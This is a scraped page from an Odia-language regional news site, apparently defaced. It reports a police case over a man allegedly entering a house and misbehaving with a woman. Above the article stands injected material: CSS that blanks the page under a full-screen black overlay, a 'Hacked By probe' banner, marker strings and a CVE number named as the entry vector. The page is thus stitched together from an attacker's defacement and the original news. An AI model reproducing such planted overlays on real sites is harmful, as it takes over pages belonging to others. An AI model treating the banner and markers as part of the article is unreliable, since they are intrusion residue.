html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPKQR04E4X
`58; Hacked By probe `68;
[ HXIMPkqr04e4x ]
HXIMPkqr04e4x
CVE-2026-49049 | import vector

ଘରେ ପଶି ମହିଳାଙ୍କୁ ଅସଦାଚରଣ 

User Rating: 0 / 5

Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 

ବେତନଟୀ(ଶାସକ ପ୍ରଶାସକ) : ବେତନଟୀ ଥାନା ଅଧୀନ ଓରାଚନ୍ଦାବିଲାର ସ୍ୱର୍ଗତଃ ବିଦ୍ୟାଧର ନାଏକଙ୍କ ପୁଅ ସରୋଜ କୁମାର ନାଏକ ସୁଶାନ୍ତ ପଣ୍ଡାଙ୍କ ଘର ଭିତରକୁ ପଶିଆସି ନାନାଦି ଅଶ୍ଳିଳ ଭାଷା ପ୍ରୟୋଗ କରିବା ସହିତ ସୁଶାନ୍ତଙ୍କ ପତ୍ନୀ  ସୈରେନ୍ଧ୍ରୀ ପଣ୍ଡାଙ୍କୁ ଅସଦାଚରଣ କରି ଥିବାର ଅଭିଯୋଗ ହୋଇଛି  । ଏହି ଘଟଣା ବାବଦରେ ସୈରେନ୍ଧ୍ରୀ ବେତନଟୀ ଥାନାରେ ଲିଖିତ ଭାବେ ଅଭିଯୋଗ କରିବା ପରେ ବେତନଟୀ ଥାନା ଆଇଆଇସି ତିଳୋତ୍ତମା ରାଉତ ଦଫା ୪୪୮, ୪୨୭, ୩୨୩, ୩୫୪, ୫୦୬ ଭାରତୀୟ ପିଙ୍ଗଳ କୋର୍ଡ ମୂଳେ ମାମଲା ନମ୍ବର ୧୬୯/୨୦୨୧ ରୁଜୁ କରି କୃଷ୍ଣଚନ୍ଦ୍ରପୁର ଫାଣ୍ଡି ଅଧିକାରୀ ଚନ୍ଦ୍ରକାନ୍ତ ରଣଜିତଙ୍କୁ ତଦନ୍ତ ଭାର ପ୍ରଦାନ କରିଛନ୍ତି ।

0
0
0
s2sdefault